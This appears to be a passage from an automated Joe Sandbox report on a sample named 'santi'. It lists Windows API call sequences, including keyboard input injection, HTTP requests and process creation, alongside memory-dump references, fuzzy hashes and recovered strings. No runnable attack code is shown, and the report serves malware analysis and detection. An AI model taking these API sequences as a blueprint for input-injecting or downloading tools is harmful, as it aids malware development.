                                                                • Opcode ID: f34461afd5642bff215e267d931b1570605a63c2962fb9cacf717b8de7317baf
                                                                • Instruction ID: bc01a0f28f7115896042dcee314c8e0d031e11b38cd0044c50344a295b3f501f
                                                                • Opcode Fuzzy Hash: f34461afd5642bff215e267d931b1570605a63c2962fb9cacf717b8de7317baf
                                                                • Instruction Fuzzy Hash: 3E9199306083419FCB15DF25C48196BFBE8AF89704F14896EF98ACB362DB31E945CB52
                                                                APIs
                                                                  • Part of subcall function 002FC6F4: _wcscpy.LIBCMT ref: 002FC717
                                                                • _memset.LIBCMT ref: 00325438
                                                                • GetMenuItemInfoW.USER32(?), ref: 00325467
                                                                • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00325513
                                                                • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0032553D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                • String ID: 0
                                                                • API String ID: 4152858687-4108050209
                                                                • Opcode ID: 09110614d8e863316dcd1b8fb25385b0181bb693f4dffb4338ae78e680c97988
                                                                • Instruction ID: 831c197e055042399ef57c05d6b5d1b9eaced3d36d45cabf800662839ffbda61
                                                                • Opcode Fuzzy Hash: 09110614d8e863316dcd1b8fb25385b0181bb693f4dffb4338ae78e680c97988
                                                                • Instruction Fuzzy Hash: DC5111316147219BD316EF29E8407BBB7E8EF86360F150629F996D3190DBB0CE408B92
                                                                APIs
                                                                • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0032027B
                                                                • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 003202B1
                                                                • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 003202C2
                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00320344
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ErrorMode$AddressCreateInstanceProc
                                                                • String ID: DllGetClassObject
                                                                • API String ID: 753597075-1075368562
                                                                • Opcode ID: d3236253b813bac2952f26b4982d180da352be3ae7d60d4ffb3032eed8b273b3
                                                                • Instruction ID: ea7e3c5cec6869eb0a9bcccc876bbe34edd04d72c949070b3c6e731cf4fb52fe
                                                                • Opcode Fuzzy Hash: d3236253b813bac2952f26b4982d180da352be3ae7d60d4ffb3032eed8b273b3
                                                                • Instruction Fuzzy Hash: AD415E75A00214EFDB0ACF54D8C4B9A7BB9EF49314F1580A9EA099F206D7B1D948CBA0
                                                                APIs
                                                                • _memset.LIBCMT ref: 00325075
                                                                • GetMenuItemInfoW.USER32 ref: 00325091
                                                                • DeleteMenu.USER32(00000004,00000007,00000000), ref: 003250D7
                                                                • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,003A1708,00000000), ref: 00325120
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Menu$Delete$InfoItem_memset
                                                                • String ID: 0
                                                                • API String ID: 1173514356-4108050209
                                                                • Opcode ID: af9829ecdb8809581acea100955b16df6be0dfa38dbbb959ed473c94d957e81b
                                                                • Instruction ID: fc5768e511ea2c423fdb1f9531fef90f9fda6aa7ceabe8a134968db2c1013a7b
                                                                • Opcode Fuzzy Hash: af9829ecdb8809581acea100955b16df6be0dfa38dbbb959ed473c94d957e81b
                                                                • Instruction Fuzzy Hash: 7E41F6312047119FDB12DF24EC80B2BB7E8AF85324F04861EF9559B2D1D770EA10CB62
                                                                APIs
                                                                • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00323966
                                                                • SetKeyboardState.USER32(00000080,?,00000001), ref: 00323982
                                                                • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 003239EF
                                                                • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00323A4D
                                                                Strings
                                                                • qw601qqw601qqw601qqw661qqw6a1qqw601qqw631qqw661qqw6a1qqw601qqw601qqw661qqw6a1qqw601qqw671qqw661qqw681qqw601qqw601qqw601qqw601qqw60, xrefs: 0032399D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                • String ID: qw601qqw601qqw601qqw661qqw6a1qqw601qqw631qqw661qqw6a1qqw601qqw601qqw661qqw6a1qqw601qqw671qqw661qqw681qqw601qqw601qqw601qqw601qqw60
                                                                • API String ID: 432972143-3317250924
                                                                APIs
                                                                • GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 00323AB8
                                                                • SetKeyboardState.USER32(00000080,?,00008000), ref: 00323AD4
                                                                • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00323B34
                                                                • SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 00323B92
                                                                Strings
                                                                • qw601qqw601qqw601qqw661qqw6a1qqw601qqw631qqw661qqw6a1qqw601qqw601qqw661qqw6a1qqw601qqw671qqw661qqw681qqw601qqw601qqw601qqw601qqw60, xrefs: 00323AF2
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                • String ID: qw601qqw601qqw601qqw661qqw6a1qqw601qqw631qqw661qqw6a1qqw601qqw601qqw661qqw6a1qqw601qqw671qqw661qqw681qqw601qqw601qqw601qqw601qqw60
                                                                • API String ID: 432972143-3317250924
                                                                APIs
                                                                • CharLowerBuffW.USER32(?,?,?,?), ref: 00340587
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: BuffCharLower
                                                                • String ID: cdecl$none$stdcall$winapi
                                                                • API String ID: 2358735015-567219261
                                                                APIs
                                                                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0031B88E
                                                                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0031B8A1
                                                                • SendMessageW.USER32(?,00000189,?,00000000), ref: 0031B8D1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: MessageSend
                                                                • String ID: ComboBox$ListBox
                                                                • API String ID: 3850602802-1403004172
                                                                APIs
                                                                • _memset.LIBCMT ref: 002E522F
                                                                • _wcscpy.LIBCMT ref: 002E5283
                                                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 002E5293
                                                                • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00353CB0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                                • String ID: Line:
                                                                • API String ID: 1053898822-1585850449
                                                                APIs
                                                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00334401
                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00334427
                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00334457
                                                                • InternetCloseHandle.WININET(00000000), ref: 0033449E
                                                                  • Part of subcall function 00335052: GetLastError.KERNEL32(?,?,003343CC,00000000,00000000,00000001), ref: 00335067
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                • String ID:
                                                                • API String ID: 1951874230-3916222277
                                                                APIs
                                                                  • Part of subcall function 002FD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 002FD1BA
                                                                  • Part of subcall function 002FD17C: GetStockObject.GDI32(00000011), ref: 002FD1CE
                                                                  • Part of subcall function 002FD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 002FD1D8
                                                                • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0034915C
                                                                • LoadLibraryW.KERNEL32(?), ref: 00349163
                                                                • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00349178
                                                                • DestroyWindow.USER32(?), ref: 00349180
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                • String ID: SysAnimate32
                                                                • API String ID: 4146253029-1011021900
                                                                APIs
                                                                • GetStdHandle.KERNEL32(0000000C), ref: 00329588
                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003295B9
                                                                • GetStdHandle.KERNEL32(0000000C), ref: 003295CB
                                                                • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00329605
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: CreateHandle$FilePipe
                                                                • String ID: nul
                                                                • API String ID: 4209266947-2873401336
                                                                APIs
                                                                • GetStdHandle.KERNEL32(000000F6), ref: 00329653
                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00329683
                                                                • GetStdHandle.KERNEL32(000000F6), ref: 00329694
                                                                • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 003296CE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: CreateHandle$FilePipe
                                                                • String ID: nul
                                                                • API String ID: 4209266947-2873401336
                                                                APIs
                                                                • SetErrorMode.KERNEL32(00000001), ref: 0032DB0A
                                                                • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0032DB5E
                                                                • __swprintf.LIBCMT ref: 0032DB77
                                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000,0037DC00), ref: 0032DBB5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ErrorMode$InformationVolume__swprintf
                                                                • String ID: %lu
                                                                • API String ID: 3164766367-685833217
                                                                APIs
                                                                  • Part of subcall function 0031C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0031C84A
                                                                  • Part of subcall function 0031C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0031C85D
                                                                  • Part of subcall function 0031C82D: GetCurrentThreadId.KERNEL32 ref: 0031C864
                                                                  • Part of subcall function 0031C82D: AttachThreadInput.USER32(00000000), ref: 0031C86B
                                                                • GetFocus.USER32 ref: 0031CA05
                                                                  • Part of subcall function 0031C876: GetParent.USER32(?), ref: 0031C884
                                                                • GetClassNameW.USER32(?,?,00000100), ref: 0031CA4E
                                                                • EnumChildWindows.USER32(?,0031CAC4), ref: 0031CA76
                                                                • __swprintf.LIBCMT ref: 0031CA90
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                                • String ID: %s%d
                                                                • API String ID: 3187004680-1110647743
                                                                • Opcode ID: fbfc1c7a04e30dbd0e8fa7dd640aea45882e6983968b58544c5001e82cfe7c2c
                                                                • Instruction ID: c459039005096ce34861ca7f371082b316627e36c7d31ebf93ddec166250d357
                                                                • Opcode Fuzzy Hash: fbfc1c7a04e30dbd0e8fa7dd640aea45882e6983968b58544c5001e82cfe7c2c
                                                                • Instruction Fuzzy Hash: C51172716502097BDB17BF60DCC9FE9376CAF58714F009066FE08AA182CB709585DB71
                                                                APIs
                                                                • __lock.LIBCMT ref: 00307AD8
                                                                  • Part of subcall function 00307CF4: __mtinitlocknum.LIBCMT ref: 00307D06
                                                                  • Part of subcall function 00307CF4: EnterCriticalSection.KERNEL32(00000000,?,00307ADD,0000000D), ref: 00307D1F
                                                                • InterlockedIncrement.KERNEL32(?), ref: 00307AE5
                                                                • __lock.LIBCMT ref: 00307AF9
                                                                • ___addlocaleref.LIBCMT ref: 00307B17
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                • String ID: `6
                                                                • API String ID: 1687444384-2178887039
                                                                • Opcode ID: 3a2d34348b75673652d56c18e0daffb1f6152283b39bf9ea3a11a14c49fccd05
                                                                • Instruction ID: 0fedcbde0a5b38d50cfba9c0aafa5fc2ee04185e3f8c95f3f764b08692074797
                                                                • Opcode Fuzzy Hash: 3a2d34348b75673652d56c18e0daffb1f6152283b39bf9ea3a11a14c49fccd05
                                                                • Instruction Fuzzy Hash: F2016175906B00DFD722DF75C91674AB7F0AF40325F20890EE4969B6E0CBB0A644CB45
                                                                APIs
                                                                • _memset.LIBCMT ref: 0034E33D
                                                                • _memset.LIBCMT ref: 0034E34C
                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,003A3D00,003A3D44), ref: 0034E37B
                                                                • CloseHandle.KERNEL32 ref: 0034E38D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: _memset$CloseCreateHandleProcess
                                                                • String ID: D=:
                                                                • API String ID: 3277943733-607546626
                                                                • Opcode ID: 3e48b8cf796815efab032c9d0f9f67d3842b3e84d0934cbf179e33ce54f96fea
                                                                • Instruction ID: 01b10d665eb8200c9b8b89197313dca99fa15125d326de6fb594887c5e897434
                                                                • Opcode Fuzzy Hash: 3e48b8cf796815efab032c9d0f9f67d3842b3e84d0934cbf179e33ce54f96fea
                                                                • Instruction Fuzzy Hash: 5BF082F5640304FEE3131BA0AC56FB7BE5CDB06B54F004421FE0ADA1A2D3759E0086B8
                                                                APIs
                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 003419F3
                                                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00341A26
                                                                • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00341B49
                                                                • CloseHandle.KERNEL32(?), ref: 00341BBF
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                • String ID:
                                                                • API String ID: 2364364464-0
                                                                • Opcode ID: 34a6c620901aa11ca5857969c8d112ff4442046e9872003ef705c70774aae749
                                                                • Instruction ID: e73ebbfa1bf83ed1b8e35b8c9b42d1b16bdb829e472809a618ffc2f90687db2f
                                                                • Opcode Fuzzy Hash: 34a6c620901aa11ca5857969c8d112ff4442046e9872003ef705c70774aae749
                                                                • Instruction Fuzzy Hash: 6481A170610204EBDF119F64C896BADBBE5EF08720F158469FA05AF3C2D7B5E9518F90
                                                                APIs
                                                                • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0034E1D5
                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 0034E20D
                                                                • IsDlgButtonChecked.USER32(?,00000001), ref: 0034E248
                                                                • GetWindowLongW.USER32(?,000000EC), ref: 0034E269
                                                                • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0034E281
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$ButtonCheckedLongWindow
                                                                • String ID:
                                                                • API String ID: 3188977179-0
                                                                • Opcode ID: 93f9979dfa3790059a020dca26234ecd7918db92086e54f5af3284b562bba632
                                                                • Instruction ID: 1fc498cb044ef6cd2470044173c6708830f85604568bfc42f0f7646344980520
                                                                • Opcode Fuzzy Hash: 93f9979dfa3790059a020dca26234ecd7918db92086e54f5af3284b562bba632
                                                                • Instruction Fuzzy Hash: CF618E34A40204AFDB26CF59C894FBAB7FAFF4A300F154059E9599B2A1C7B1B940CB10
                                                                APIs
                                                                • VariantInit.OLEAUT32(?), ref: 00321CB4
                                                                • VariantClear.OLEAUT32(00000013), ref: 00321D26
                                                                • VariantClear.OLEAUT32(00000000), ref: 00321D81
                                                                • VariantClear.OLEAUT32(?), ref: 00321DF8
                                                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00321E26
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
